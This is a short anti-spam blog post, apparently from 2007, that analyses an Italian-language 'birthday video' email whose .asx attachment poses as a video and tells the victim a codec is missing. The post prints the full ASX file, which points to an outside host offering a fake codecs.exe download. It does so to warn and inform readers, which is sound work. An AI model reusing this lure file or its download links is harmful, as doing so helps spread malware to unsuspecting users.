Joe Wein
Fighting spam and scams
on the Internet

Home / Blog / About us
Spam
419/Nigeria
Online fraud
jwSpamSpy
Contact

Email Spam Filter:
 jwSpamSpy
Try it for free!

Google
 

Trojans targetting Brazilians

The following Italian language email aims to install a piece of malware on your computer. If you click on its attachment (filmato.asx) then you will be asked if you want to install a driver for the video format. If you accept, Windows will download mailware from another server and turn your computer into a remote-controlled zombie.

Example: 

Received: from tiscali.it (AMontpellier-152-1-48-154.w81-251.abo.wanadoo.fr
 [81.251.190.154]) by cobalt.pobox.com (Postfix) with SMTP id 18C604000A3 for
 <joewein@pobox.com>; Sun, 11 Feb 2007 06:36:16 -0500 (EST)
Message-ID: <20070211114345500.SXyzbq6fdq3KSCqfaaWO@cobalt.pobox.com>
From: "lainello@tiscali.it" <lainello@tiscali.it>
To: "joewein@pobox.com" <joewein@pobox.com>
Subject: Compleanno
Date: Sun, 11 Feb 2007 12:43:45 +0100

Il video del mio compleanno,
indovina chi e' la persona che mi sta a fianco? 


Ciao...




Here is the actual content of the attachment:


<ASX version="3.0">
	<ENTRY>
		<TITLE>Impossibile Trovare il Codec</TITLE>
		<REF HREF ="http://updatecodecs.t35.com/video.avi"/>
		<DURATION VALUE="60:00"/>
		<BANNER HREF ="http://updatecodecs.t35.com/img.gif">
			<ABSTRACT>Clicca qui per scaricare i codec aggiornati</ABSTRACT>
			<MOREINFO HREF ="http://updatecodecs.t35.com/codecs.exe" />
		</BANNER>
	</ENTRY>
</ASX>





Other versions of this malware spam load other exceutables using different names, this is just one example.